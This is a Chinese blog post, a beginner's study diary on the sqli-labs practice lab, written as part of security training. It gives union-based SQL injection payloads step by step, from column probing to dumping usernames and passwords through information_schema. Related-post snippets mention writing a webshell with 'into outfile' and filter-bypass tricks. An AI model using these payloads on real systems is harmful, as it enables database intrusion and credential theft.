180514[web潜修第一天]

最新推荐文章于 2022-01-31 14:13:18 发布
最新推荐文章于 2022-01-31 14:13:18 发布
阅读量153 收藏
点赞数
分类专栏: web路
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qiutyu/article/details/80314588
版权

玩了几天sqli-lab了是时候总结一下学过的东西了。

sqli-lab1——报错注入

第一步,猜列数,用order by 猜列数,然后得到列数是3.

第二步,爆可回显字段,得到2,3列是可以回显的。?id=0' union select 1,2,3 -- - 至于这里为什么要用0而不是用1是因为根据具体php而看的,在这一关用0会爆出所有信息。

第三步,爆所有数据库。?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata -- -infromation_schema.schemata是一个特殊的表,听说show database是查询这个表的。可以得到全部数据库,然后就顺利的得到了系统数据库security。

第四步,爆表名。?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'-- -      然后看见一张关键的表users。

第五步,还是那样,爆字段。?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'-- -     最后愉快的发现了username和password的字段。

最后一步,爆内容。 ?id=0' union select 1,2,group_concat(username) from users -- -

                              ?id=0' union select 1,2,group_concat(password) from users -- -

然后就得到了所有用户数据了。。emm这一关作为入门是真的挺不错的,很详细,也没有其他很复杂的思路和绕过,适合像我这样的新手入门。


进度:

sqli-lab 5/65

视频课一点没看,一些简单的盲注函数总算会用了,布尔型盲注感觉还行。


明日计划:

sqli-lab 6/65

是时候看看视频了,看看基于时间的盲注到底是怎么构造出来的,报错型盲注的具体用途。

Yi0nurs
关注
专栏目录
180523[web潜修第十天]
Yi0nurs的博客
05-23 137
看了下order by注入,实践了一下,感觉好像和普通的注入差不多,主要是用到rand函数比较多。sort?=rand(盲注语句),如果对于有报错回显的,可以使用报错注入用extractvalue函数构造刚刚也去做了下南邮的题目,感觉比以前好多了,自己做出来了两题。看来数据库和注入没白学。打算六月份或者七月份就把nisp一级给考了,不知道用处大不大,考了再说,现在的我还是太弱了,等看完sql注入就...
180521[web潜修第八天]
Yi0nurs的博客
05-21 100
今天看了有关服务器解析的题目和宽字节注入,在暑假的时候看了盲注和宽字节注入但是感觉没用上一直都只是处于知道的状态,今天实践了一下才知道宽字节注入的实际用途,用%df来消掉'前面的\,由于一个函数的转义,把'转成\',所以不能正常注入,通过宽字节把\消除掉。至于服务器的解析问题,我终于知道红帽那个题为什么是用JSP马了,原来是是tomcat的原因,只能解析jsp不能解析php,难怪那些大佬一眼就看出...
180522[web潜修第九天]
Yi0nurs的博客
05-22 142
今天看得不多,看到了45关了,了解了注入对于数据库结构的影响,以及可以插入或者修改数据库内容,已经不是简单的查询了。最近周末也有学数据库结构和查询,今天天书里的数据库语句我都看懂了,不像以前别人的writeup都看不懂了,等看完天书就再了解一下SSRF和CSRF,再看一下数据库解析就差不多了,感觉比以前好多了,扫了一下自己的盲。进度:sqli-lab 45/65明日计划:orderby注入看一下,...
180518[web潜修第五天]
Yi0nurs的博客
05-18 125
今天看了下第十七关,是在passwd注入的,感觉昨天说的东西打脸了。emmm,日常打脸。然后今天学了cookie注入和referer注入还有user-agen注入,有点意思,原来我还有那么多不懂。学了新的报错语句构造,可以爆数据库所在目录,可以双重构造语句。extractvalue函数,basedir字段。总体来说今天学的东西很少很基础的东西。进度:sqli-lab 22/65盲注✔,报错✔,HT...
180517[web潜修第四天]
Yi0nurs的博客
05-17 151
今天完成了sqli-lab 11-16【post注入】,其实都是没太大区别的,要么是单引号的补全问题,要么就是报错信息会被注释掉,要自己用布尔或者时间型盲注猜解。以前一直做的搜索框、登录框那些就是post注入,现在回想起以前那些题感觉还是挺简单的,打算等等去某吧继续做一下CTF题巩固一下。post注入要点:一是要留意单引号或者括号的闭合,后续的多余部分要记得注释掉,其次就是在username框中构...
180519-180520[web潜修第六到第七天]
Yi0nurs的博客
05-20 132
昨天打RCTF,一眼看过去web题才做十几个人,感觉没什么希望,然后转去看了。然后就在杂项做出了2题。然后偷懒休息了一天没更新。今天看了下sqli-lab,原来and 和 or的过滤可以用 &&和||绕过的,空格过滤则可以用/**/,但是很多时候都会过滤*和/,今天看那些题还有过滤-和#那样就没法注释掉后面的'了或者多余的东西,然后看到一个骚操作。用1'或者or '1'='1 来闭...
180515-180516[web潜修第二天&&第三天]
Yi0nurs的博客
05-16 122
本来想昨天写的第二天,结果发现手机上居然不能写博客???看来是我高估了CSDN了= =所以还是老老实实,今天在电脑前敲字吧....看到了sqli-lab 7,感觉整个人都不好了,原来还能把结果保存到文件上,然后把一句话导入到文件里面,然后菜刀或者蚁剑连接,这波操作真的666,今天实践了一下发现了点问题。在构造语句?id=UNION SELECT 1,2,3 into outfile "c:\\wa...
Kotlin入门潜修
lv1317039693的博客
11-28 336
简书专题:kotlin入门潜修专题系列 kotlin入门潜修之开门篇—kotlin是什么? kotlin入门潜修之基础篇—基础语法kotlin入门潜修之基础篇—packages(包)相关kotlin入门潜修之基础篇—控制表达式kotlin入门潜修之基础篇—返回和跳转 kotlin入门潜修之类和对象篇—类和对象kotlin入门潜修之类和对象篇—继承kotlin入门潜修之类和对象篇—属性和字段k...
kotlin入门潜修系列教程
weixin_34185320的博客
02-27 99
kotlin入门潜修之开门篇—kotlin是什么? kotlin入门潜修之基础篇—基础语法 kotlin入门潜修之基础篇—packages(包) kotlin入门潜修之基础篇—控制表达式 kotlin入门潜修之基础篇—返回和跳转 kotlin入门潜修之类和对象篇—类和对象 kotlin入门潜修之类和对象篇—继承 kotlin入门潜修之类和对象篇—属性和字段 kotlin入门潜修之类和对象篇—接口 ...
深水半潜修井平台电力系统FMEA关键点.pdf
08-28
深水半潜修井平台电力系统FMEA关键点.pdf
java版ss源码-SpringMvcMybatis:SpringMvcMybatis项目框架整合,加入bruid数据库连接池
06-04
java版ss源码 ...使用idea的maven创建一个基本的web工程. 打开Idea在欢迎界面选择创建一个新的Project或者是(在菜单界面选择:New→Project),这是会出现一个界面如下图所示: 如上图所示,我们需要勾选的
2018年全国大学生数学建模竞赛
10-22
问题二要求在限定时间内,通过调整工作服第二层的厚度来保证皮肤外侧温度不超过某一值,问题三要求同时调整第二层和第四层的厚度来达到同样的目的。这些优化问题通常涉及目标函数和约束条件的设定,通过优化算法来...
Android自定义控件开发入门与实战(12)Canvas,kotlin入门潜修
m0_66264324的博客
01-31 358
RectF bounds:要保存的区域所对应的举行对象 int saveFlags:取值ALL_SAVE_FLAG表示保存全部内容。别的值之后再讲述。 第二个构造函数其实和第一个一样,只不过它是根据4个点来构造一个矩形的。 下面我们接下来以Xfermode为例,看看saveLayer()函数都做了什么。 我们先使用Xfermode来做一个SRC_IN的效果: @Override protected void onDraw(Canvas canvas) { super.onDraw(canvas)..
文件转换为Base64形式(可来回转换,带加密功能)
最新发布
10-09
文件转换为Base64形式(可来回转换,带加密功能) 使用说明 === https://blog.csdn.net/sxzlc/article/details/139076076 ====
基于粒子群算法的配电网日前优化调度 采用IEEE33节点配电网搭建含风光,储能,柴油发电机和燃气轮机的经济调度模型 以运行成本
10-09
基于粒子群算法的配电网日前优化调度 采用IEEE33节点配电网搭建含风光,储能,柴油发电机和燃气轮机的经济调度模型。 以运行成本和环境成本最小为目标,考虑储能以及潮流等约束,采用粒子群算法对模型进行求解,得到电源的每小时出力情况。
ECU ccp协议上位机测试与标定源码,C#源码上位机ECU标定与测量程序 - ASAM MCD -1MC的 ccp 标定与测
10-09
ECU ccp协议上位机测试与标定源码,C#源码上位机ECU标定与测量程序。 - ASAM MCD -1MC的 ccp 标定与测量上位机软件,短上传和DAQ功能,支持一维二维等测量和标定,显示控件丰富,具有仪表盘,进度条,二维map等。 - ASAM MCD-2MC 的文件读取(a2l文件读取) - 在解析的同时提供了文件结构检查 - 读取和导出ECU 测量数据为excel文件 - 支持多个设备 ,包括 ETAs, Vector, Peak, 8Devices, Kvaser, usbcan兼容设备 等等CAN设备的支持,同时有一个简单的接口,用于实现其他设备支持,接口dll函数替即可。 .Net 目标框架为 4.0,需要引用Excel程序,默认版本为 office 2019,也可在源码中修改。
超市商品管理系统 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS).zip
10-09
超市商品管理系统 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS) 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
GTO-CNN-BiLSTM进行多变量多步时间序列预测的详细Python 项目实例(包含详细的完整的程序和数据)
10-09
本文提供了一个基于图论优化(GTO)、卷积神经网络(CNN)和双向长短期记忆网络(BiLSTM)相结合的时间序列预测项目实例。通过一系列具体操作,包括数据预处理、构建融合CNN与BiLSTM特性的模型,以及最后的训练、验证直至预测与可视化结果等流程,向读者展示了一个典型且易上手的实验范本。 适用人群:有一定深度学习与时间序列数据分析背景的知识工作者和技术人员。 使用场景及目标:适用于金融分析、天气预报等领域内的多种多变量时间序列的长期与短期趋势预报,特别是那些对模型解释性和精度都有较高要求的应用场合。 阅读收获:理解GTO-CNN-BiLSTM模型及其组件(卷积层、双向LSTM层等)的工作机制,掌握一套实用且高效的时序数据分析技巧,有助于提高相关领域的应用研究和项目实践经验。
利用andriod studio 写一个数据存储代码
03-28
下面是一个简单的数据存储示例,在 Android Studio 中使用 SharedPreferences 存储字符串数据: 1. 在项目的 build.gradle 文件中添加以下依赖项: ```groovy dependencies { implementation 'androidx....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值